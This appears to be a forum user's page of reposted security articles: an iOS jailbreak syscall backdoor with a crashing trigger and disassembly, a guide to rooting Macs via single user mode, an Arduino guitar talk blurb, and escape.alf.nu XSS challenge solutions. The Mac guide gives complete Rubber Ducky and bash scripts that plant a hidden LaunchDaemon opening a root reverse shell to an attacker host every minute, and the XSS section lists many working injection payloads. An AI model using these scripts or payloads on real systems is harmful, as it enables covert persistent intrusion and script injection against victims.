Everything posted by Nytro
-
[h=1]Evading iOS Security[/h]

Here’s some code:

main() { syscall(0, 0x41414141, -1); }

Here’s what happens when you run it on a device using evasi0n7:

panic(cpu 0 caller 0x9dc204d7): sleh_abort: prefetch abort in kernel mode: fault_addr=0x41414140
r0: 0xffffffff   r1: 0x27dffdec   r2: 0x2bf0e9c4   r3: 0x2bf0e95c
r4: 0x41414141   r5: 0xa48782d4   r6: 0x81b6f594   r7: 0x8f5d3fa8
r8: 0x9df1d614   r9: 0x81b6f330   r10: 0x9df1db00  r11: 0x00000006
r12: 0x00000000  sp: 0x8f5d3f60   lr: 0x93dd7048   pc: 0x41414140
cpsr: 0x20000033 fsr: 0x00000005  far: 0x41414140

And here’s what happens on an ARM64 device that also uses evasi0n7:

panic(cpu 0 caller 0xffffff801522194c): PC alignment exception from kernel. (saved state: 0xffffff800dbc4640)
x0: 0x2bea99c400401e08  x1: 0x00402fe92bea995c  x2: 0xbdf4cd1500403008  x3: 0x0040156400000000
x4: 0x0040156400000000  x5: 0x000000002bea995c  x6: 0x00402fe92bea995c  x7: 0xffffff80975df438
x8: 0xffffffff41414141  x9: 0x000000000000000e  x10: 0xffffff8096f9b100 x11: 0x0000000000000000
x12: 0x0000000003000004 x13: 0x0000000000401420 x14: 0x000000002be925a1 x15: 0x0000000000402ffe
x16: 0x0000000000000000 x17: 0x0000000000000000 x18: 0x0000000000000000 x19: 0xffffff8096f9b410
x20: 0xffffff80977203f0 x21: 0xffffff80975df438 x22: 0xffffff80155ea3c8 x23: 0x0000000000000018
x24: 0xffffff8096f9b418 x25: 0x0000000000000000 x26: 0x0000000000000006 x27: 0x0000000000000000
x28: 0xffffff80155ea3c8 fp: 0xffffff800dbc4a60  lr: 0xffffff8015362434  sp: 0xffffff800dbc4990
pc: 0xffffffff41414141  cpsr: 0x60000304        esr: 0x8a000000         far: 0xffffffff41414141

And here’s the system call handler for system call 0… (ARM32, of course!)
__text:00000000         CODE32
__text:00000000         STMFD   SP!, {R4-R7,LR}
__text:00000004         MOV     R5, R2
__text:00000008         MOV     R6, R1
__text:0000000C         LDR     R0, =0x9E415A34
__text:00000010         BLX     R0
__text:00000014         LDR     R0, =0x9E41E160
__text:00000018         BLX     R0
__text:0000001C         LDR     R0, =0x9E415958
__text:00000020         BLX     R0
__text:00000024         LDR     R0, [R6]
__text:00000028         CMP     R0, #0
__text:0000002C         BEQ     locret_50
__text:00000030         MOV     R4, R0
__text:00000034         LDR     R0, [R6,#4]
__text:00000038         LDR     R1, [R6,#8]
__text:0000003C         LDR     R2, [R6,#0xC]
__text:00000040         LDR     R3, [R6,#0x10]
__text:00000044         BLX     R4
__text:00000048         STR     R0, [R5]
__text:0000004C         MOV     R0, #0
__text:00000050
__text:00000050 locret_50                        ; CODE XREF: __text:0000002C
__text:00000050         LDMFD   SP!, {R4-R7,PC}
__text:00000050 ; ---------------------------------------------------------------------------
__text:00000054 off_54  DCD 0x9E415A34           ; DATA XREF: __text:0000000C
__text:00000058 off_58  DCD 0x9E41E160           ; DATA XREF: __text:00000014
__text:0000005C off_5C  DCD 0x9E415958           ; DATA XREF: __text:0000001C

In short: the handler treats the syscall argument block as a userland structure, loads a function pointer from it (LDR R0, [R6]), loads four arguments from the words that follow, and branches to the function pointer in kernel mode. Calling syscall 0 with a bogus pointer like 0x41414141 is exactly what produces the panics above, with pc landing at the attacker-chosen address.

Jailbreaking ruins security and integrity. Enough said. Have a good day.

(Oh, it can also be used by any user, including mobile. One can wonder whether TaiG or the like is using this as a back door…)

Source: Evading iOS Security – winocm blog
-
Root a Mac in 10 seconds or less

Posted on November 18, 2013 by Patrick Mosca

Oftentimes, physical access to a machine means game over. While people like to think that OS X is immune to most security threats, even Apple computers can be susceptible to physical attacks. Mac OS X can boot into single user mode when a special key combination (Command-S) is held down. From that point, an attacker has root access to the entire computer. Note that this is not a security exploit, but rather an intentionally designed feature. The intruder does of course need to be physically present, but this can still become a huge security problem. (There is a proven method for preventing this attack that I will cover at the end of the article.)

Since physical access to the machine is required, time is precious and must be cut to a minimum. There are two ways to optimize time: scripts, and a little tool called the USB Rubber Ducky. The Rubber Ducky is a small HID (human interface device) that looks like a flash drive and acts like a keyboard. It is designed to pound out scripts at freakish speeds, as if you were typing them yourself. Of course, a plain flash drive will work too.

This backdoor is almost identical to the basic backdoor described in OSX Backdoor – Persistence. Read that article if you would like to better understand the inner workings of this backdoor. Similarly, we will create a script that sends a shell back home through netcat. Finally, we will register the script as a LaunchDaemon, where it will be executed as root every 60 seconds.

The Rubber Ducky Method

1) Download the Ducky Decoder and Firmware from here. Be sure to use duck_v2.1.hex or above. There are instructions on how to flash your ducky. At the time of writing, I used Ducky Decoder v2.4 and the duck_v2.1.hex firmware. (Special thanks to midnitesnake for patching the firmware.)

2) Create the script source.txt. Be sure to replace mysite.com with your IP address or domain name. Similarly, put your own port number in place of 1337 on the same line.
REM Patrick Mosca
REM A simple script for rooting OSX from single user mode.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200
STRING echo '<?xml version="1.0" encoding="UTF-8"?>
ENTER
STRING <plist version="1.0"><dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict></plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500
STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 1000
STRING shutdown -h now
ENTER

3) Compile and install the script. From within the ducky decoder folder, execute:

java -jar encoder.jar -i source.txt -o inject.bin -l us

Move your inject.bin over to the ducky.

4) Boot into single user mode (Command-S).

5) At the command prompt, plug in the ducky.

6) Catch your shell:

nc -l -p 1337

or, depending on your netcat build:

nc -l 1337

Say hello! You are now root.

The USB Flash Drive Method

1) Create the file install.bash on a flash drive.
#!/bin/bash
# Create the hidden directory /Library/.hidden
mkdir /Library/.hidden
# Copy the script to the hidden folder
echo "#!/bin/bash
bash -i >& /dev/tcp/mysite.com/1337 0>&1
wait" > /Library/.hidden/connect.sh
# Give the script permission to execute
chmod +x /Library/.hidden/connect.sh
# Create directory if it doesn't already exist.
mkdir /Library/LaunchDaemons
# Write the .plist to LaunchDaemons
echo '<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apples.services</string>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/sh</string>
        <string>/Library/.hidden/connect.sh</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>60</integer>
    <key>AbandonProcessGroup</key>
    <true/>
</dict>
</plist>' > /Library/LaunchDaemons/com.apples.services.plist
chmod 600 /Library/LaunchDaemons/com.apples.services.plist
# Load the LaunchDaemon
launchctl load /Library/LaunchDaemons/com.apples.services.plist
shutdown -h now

2) Boot into single user mode (Command-S).

3) Execute the commands.

mount -uw /
mkdir /Volumes/usb
ls /dev
mount_msdos /dev/disk1s1 /Volumes/usb
cd /Volumes/usb
./install.bash

disk1s1 will change! If you’re not sure which device is your flash drive, take the device out, list devices, plug the flash drive back in, and list devices again. Your flash drive is the device that has come and gone.

4) Catch your shell:

nc -l -p 1337

or, depending on your netcat build:

nc -l 1337

The difference between the USB Rubber Ducky method and the flash drive method is night and day. A little more preparation goes into setting up the ducky, but its execution time is prime. When time is of the essence, listing devices, making directories, and mounting flash drives can impede an “operation.” Whichever route you choose, both methods ensure a persistent backdoor running as root.

As for preventing this lethal attack, there are two possible defenses.
1) Locking the EFI firmware, which puts single user mode behind a password. Don’t do this. It is a complete waste of time: the password can be reset by removing physical RAM and resetting the PRAM, as described here.

2) The only sure way to prevent unwanted root access to your system is to simply enable FileVault’s full disk encryption (not home folder encryption!). Since this encrypts the entire drive, it will be impossible to access single user mode without the (strong) password. Problem solved.

This article was written to show the vulnerabilities of Macs without full disk encryption or locked EFI firmware. Please, no one get in trouble: it is very easy to sniff the wire and find the attacker’s IP address when it is causing excessive noise every 60 seconds. I put the script and version 2.6.3 of the ducky encoder on GitHub for convenience. If you found this interesting, give it a star. Thanks for reading.

Source: Root a Mac in 10 seconds or less | Patrick Mosca
-
30c3 - The ArduGuitar: An Arduino Powered Electric Guitar

Description: The ArduGuitar is an electric guitar with no physical controls, i.e. no buttons or knobs to adjust volume or tone, or to select the pickups. All of these functions are performed remotely via a bluetooth device such as an Android phone, or via a dedicated Arduino-powered bluetooth footpedal. The musician still plucks the strings, of course! This talk will give an overview of the technology, and particularly of the voyage that took me from nearly no knowledge about anything electronic to enough know-how to make it all work. I will explain what I learned by collaborating on forums, with hackerspaces and with component providers: "How to ask the right questions." The guitar with its Arduino-powered circuit and an Android tablet will be available for demo; the code is all available in the github arduguitar repo, along with the associated Arduino footpedal libraries.

For more information please visit: https://events.ccc.de/congress/2013/wiki/Main_Page

Source: 30c3 - The ArduGuitar: An Arduino Powered Electric Guitar
-
[h=1]escape.alf.nu XSS Challenges Write-ups (Part 2)[/h]

These are my solutions to Erling Ellingsen’s escape.alf.nu XSS challenges. I found them very interesting and I learnt a lot from them (especially from the last ones published in this post). I’m publishing my results since the game has been online for a long time now and there are already some sites with partial results. My suggestion, if you haven’t done it so far, is to go and try to solve them by yourselves… so come on, don’t be lazy, stop reading here and give them a try.

Ok, so if you have already solved them or need some hints, here are my solutions.

[h=1]Level 9:[/h]

function escape(s) {
  // This is sort of a spoiler for the last level
  if (/[\\<>]/.test(s)) return '-';

  return '<script>console.log("' + s.toUpperCase() + '")</script>';
}

Same as level 8, but now we cannot use angle brackets (<>) nor backslashes (\).

Solutions: It is possible to use an online non-alphanumeric encoder to encode the following payload so that it uses no alphabetic characters, angle brackets (<>) or backslashes (\):

"+alert(1))//

Producing a huge 5627-character solution:
code]"+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+
([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(+!![]+[])+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]
+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])))())//[/TD] [/TR] [/TABLE] We can also try to use our own minimization using the letters in “false”, “true”, “undefined” and “object”: [TABLE] [TR] [TD]”+!1[/TD] [TD]false[/TD] [/TR] [TR] [TD]”+!0[/TD] [TD]true[/TD] [/TR] [TR] [TD]”+{}[0][/TD] [TD]undefined[/TD] [/TR] [TR] [TD]”+{}[/TD] [TD][object Object][/TD] [/TR] [/TABLE] Strings we will need: [TABLE] [TR] 
sort: (''+!1)[3]+(''+{})[1]+(''+!0)[1]+(''+!0)[0]
constructor: (''+{})[5]+(''+{})[1]+(''+{}[0])[1]+(''+!1)[3]+(''+!0)[0]+(''+!0)[1]+(''+!0)[2]+(''+{})[5]+(''+!0)[0]+(''+{})[1]+(''+!0)[1]
alert(1): (''+!1)[1]+(''+!1)[2]+(''+!1)[4]+(''+!0)[1]+(''+!0)[0]+"(1)"

(For example, ''+!1 is "false", so (''+!1)[1] is "a".)

We will replace the call to alert(1) in our payload:

"+alert(1))//

with the following one, so we can limit the encoding to strings:

"+[]["sort"]["constructor"]("alert(1)")()//

Note: many other alternatives are possible, like:

"+(0)['constructor']['constructor']("alert(1)")()//

But I found the "sort" one to be the shortest (tied with other 4-letter functions like "trim").

This is a 246-character solution:

"+[][(''+!1)[3]+(''+{})[1]+(''+!0)[1]+(''+!0)[0]][(''+{})[5]+(''+{})[1]+(''+{}[0])[1]+(''+!1)[3]+(''+!0)[0]+(''+!0)[1]+(''+!0)[2]+(''+{})[5]+(''+!0)[0]+(''+{})[1]+(''+!0)[1]]((''+!1)[1] + (''+!1)[2] + (''+!1)[4] +(''+!0)[1]+(''+!0)[0]+"(1)")())//

We can improve it by defining a variable containing all our letters and then just referencing it:

_ = ''+!1+!0+{}[0]+{}   // "falsetrueundefined[object Object]"

");_=''+!1+!0+{}[0]+{};[][_[3]+_[19]+_[6]+_[5]][_[23]+_[19]+_[10]+_[3]+_[5]+_[6]+_[7]+_[23]+_[5]+_[19]+_[6]](_[1]+_[2]+_[4]+_[6]+_[5]+'(1)')()//

Now the solution is 144 characters, which is still far from the winners’.

The next iteration is to change the base payload to something shorter, like window.alert(1). In Chrome, we can leak a reference to window with:

(0,[]["concat"])()[0]

So, using the same strings as above, we get the following 100-character solution:

");_=""+!1+!0+{}[0]+{};(0,[][_[23]+_[19]+_[10]+_[23]+_[1]+_[5]])()[0][_[1]+_[2]+_[4]+_[6]+_[5]](1)//

We are still spending too many characters defining our alphabet. Here is where Mario surprised me once again with this tweet:

");(_=!1+URL+!0,[][_[8]+_[11]+_[7]+_[8]+_[1]+_[9]])()[0][_[1]+_[2]+_[4]+_[38]+_[9]](1)//

Note that he is using !1+URL+!0 as the alphabet string, and that it differs between browsers (the indices above match Chrome’s form):

Firefox (URL stringifies across several lines):

_=!1+URL+!0   // "falsefunction URL() {\n    [native code]\n}true"

Chrome:

_=!1+URL+!0   // "falsefunction URL() { [native code] }true"

Another of Mario’s interesting findings is that inside with-statements almost everything leaks [object Window], for example:

with(0) x=[].sort,)

[h=1]Level 10:[/h]

function escape(s) {
  function htmlEscape(s) {
    return s.replace(/./g, function(x) {
      return { '<': '&lt;', '>': '&gt;', '&': '&amp;',
               '"': '&quot;', "'": '&#39;' }[x] || x;
    });
  }

  function expandTemplate(template, args) {
    return template.replace(
      /{(\w+)}/g,
      function(_, n) { return htmlEscape(args[n]); });
  }

  return expandTemplate(
    "                                            \n\
    <h2>Hello, <span id=name></span>!</h2>       \n\
    <script>                                     \n\
      var v = document.getElementById('name');   \n\
      v.innerHTML = '<a href=#>{name}</a>';      \n\
    <\/script>                                   \n\
    ",
    { name : s }
  );
}

Injection takes place in a JS string context and, since “\” is not escaped by the htmlEscape function, we can use hex or octal encoding for the “<” symbol and bypass the
escaping function.

Valid solutions:

\x3csvg onload=alert(1)

\74svg onload=alert(1)

[h=1]Level 11:[/h]

function escape(s) {
  // Spoiler for level 2
  s = JSON.stringify(s).replace(/<\/script/gi, '');

  return '<script>console.log(' + s + ');</script>';
}

I’ve seen similar escaping functions in real applications. Normally it is not a good idea to try to fix the input data: you either accept it or reject it; trying to fix it usually leads to bypasses. In this case the escape function replaces “</script” with an empty string, so the shortest solution is:

</</scriptscript><script>alert(1)//

[h=1]Level 12:[/h]

function escape(s) {
  // Pass inn "callback#userdata"
  var thing = s.split(/#/);

  if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';
  var obj = {'userdata': thing[1] };
  var json = JSON.stringify(obj).replace(/\//g, '\\/');
  return "<script>" + thing[0] + "(" + json +")</script>";
}

Similar to level 7, but this time the slash is also escaped, so we use a similar vector with a different way to comment the junk out.

Solution:

'#';alert(1)<!--

It will render:

<script>'({"userdata":"';alert(1)<!--"})</script>

[h=1]Level 13:[/h]

function escape(s) {
  var tag = document.createElement('iframe');

  // For this one, you get to run any code you want, but in a "sandboxed" iframe.
  //
  // http://print.alf.nu/?text=... just outputs whatever you pass in.
  //
  // Alerting from print.alf.nu won't count; try to trigger the one below.

  s = '<script>' + s + '<\/script>';
  tag.src = 'http://print.alf.nu/?html=' + encodeURIComponent(s);

  window.WINNING = function() { youWon = true; };

  tag.onload = function() { if (youWon) alert(1); };

  document.body.appendChild(tag);
}

Iframes have an interesting feature: setting the name attribute on an iframe sets the name property of the iframe’s global window object to that string. The interesting part is that it also works the other way around: an iframe can define its own window.name, and the new name will be injected into the parent’s global window object if it does not already exist there (it cannot overwrite it). So if we get the framed site to declare its window.name as “youWon”, a youWon variable will be set in the parent’s global window object, and the “alert(1)” will fire.

Solution:

name='youWon'

[h=1]Level 14:[/h]

<!DOCTYPE HTML>
function escape(s) {
  function json(s) { return JSON.stringify(s).replace(/\//g, '\\/'); }
  function html(s) { return s.replace(/[<>"&]/g, function(s) {
    return '&#' + s.charCodeAt(0) + ';'; }); }

  return (
    '<script>' +
    'var url = ' + json(s) + '; // We\'ll use this later ' +
    '</script>\n\n' +
    '  <!-- for debugging -->\n' +
    '  URL: ' + html(s) + '\n\n' +
    '<!-- then suddenly -->\n' +
    '<script>\n' +
    '  if (!/^http:.*/.test(url)) console.log("Bad url: " + url);\n' +
    '  else new Image().src = url;\n' +
    '</script>'
  );
}

In order to solve this level we need to be familiar with an HTML5 parser “feature” for dealing with comments inside script blocks. The feature is well described in this post (thanks for the hint, @cgvwzq!).
The trick is that injecting an HTML5 single-line comment “<!--” followed by a “<script>” open tag moves the parser into the “script data double escaped state” until a closing script tag is found; it then transitions into the “script data escaped state” and treats everything from the end of the string where we injected “<!--<script>” as JS! The only thing we need to do is make sure there is a “-->” somewhere, so that the parser does not choke on invalid syntax. So basically, if there is a “-->” somewhere in the code (or we can inject one), we can fool the parser into processing HTML as JS. The string where we injected “<!--<script>” will still be treated as a JS string, and everything following that string becomes JS.

For this level we will make the JS engine parse the HTML part (URL: xxx). To do so, we start our payload with “alert(1)”, so that the first JS evaluated is “URL: alert(1)”. Then we want to comment out the remaining JS code, so we insert a multi-line comment opener “/*”. This way everything else is commented out until we reach the “*/” at the end of the /^http:.*/ regexp; the code from that point on will be evaluated. In order to end up with a valid expression we also inject “if(/a/” before the comment opener.
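A detail worth spelling out: once the debugging line reaches the JS engine, “URL: alert(1)” is legal JavaScript because “URL:” parses as a statement label, not as text. A quick sketch you can run in node (the label name is arbitrary, and 6 * 7 stands in for alert(1), which only exists in a browser):

```javascript
// "URL" is just a statement label; the expression after it runs normally.
// eval returns the completion value of the labelled statement.
const value = eval('URL: 6 * 7');
console.log(value); // 42
```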
So our payload will look like:

alert(1);/*<!--<script>*/if(/a//*

After cleaning it up and removing the comments, the resulting code is:

<script>
var url = "alert(1);\/*<!--<script>*\/if(\/a\/\/*";
URL: alert(1); if(/a/.test(url)) console.log("Bad url: " + url);
else new Image().src = url;
</script>

We can get it even shorter with:

if(alert(1)/*<!--<script>

This will turn into:

<script>
var url = "if(alert(1)\/*<!--<script>";
URL: if(alert(1).test(url)) console.log("Bad url: " + url);
else new Image().src = url;
</script>

[h=1]Level 15:[/h]

function escape(s) {
  return s.split('#').map(function(v) {
    // Only 20% of slashes are end tags; save 1.2% of total
    // bytes by only escaping those.
    var json = JSON.stringify(v).replace(/<\//g, '<\\/');
    return '<script>console.log('+json+')</script>';
  }).join('');
}

We can use the same trick we used for level 14. We can start with something simple like:

payload1#payload2

which renders:

<script>console.log("payload1")</script><script>console.log("payload2")</script>

We can take advantage of the HTML5 “<!--<script>” trick to change the way the parser treats the code between the two blocks and inject our “alert(1)” payload.
Note that this trick only works in HTML5 documents, and we will need to inject a closing “-->” since there is none in the code. The solution is:

<!--<script>#)/;alert(1)//-->

This will render:

<script>console.log("<!--<script>")</script><script>console.log(")/;alert(1)//-->")</script>

Since we transition to the “script data double escaped state” when the parser finds “<!--<script>”, the JS engine receives the following valid JS expression:

console.log("<!--<script>")</script><script>console.log(")/;alert(1)//-->

That can be interpreted as:

console.log("junk_string") < /junk_regexp/ ; alert(1) // -->

Where:

junk_string: <!--<script>
junk_regexp: script><script>console.log(")

Actually, you can see in the console that the first console.log writes ‘<!--<script>’.

In order to make it even shorter we can replace “//” with the Unicode line separator \u2028, as suggested by Mario.

[h=1]Level 16:[/h]

function escape(text) {
  // *cough* not done
  var i = 0;
  window.the_easy_but_expensive_way_out = function() { alert(i++) };

  // "A JSON text can be safely passed into JavaScript's eval() function
  // (which compiles and executes a string) if all the characters not
  // enclosed in strings are in the set of characters that form JSON
  // tokens."
  if (!(/[^,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/.test(
      text.replace(/"(\\.|[^"\\])*"/g, '')))) {
    try {
      var val = eval('(' + text + ')');
      console.log('' + val);
    } catch (_) {
      console.log('Crashed: '+_);
    }
  } else {
    console.log('Rejected.');
  }
}

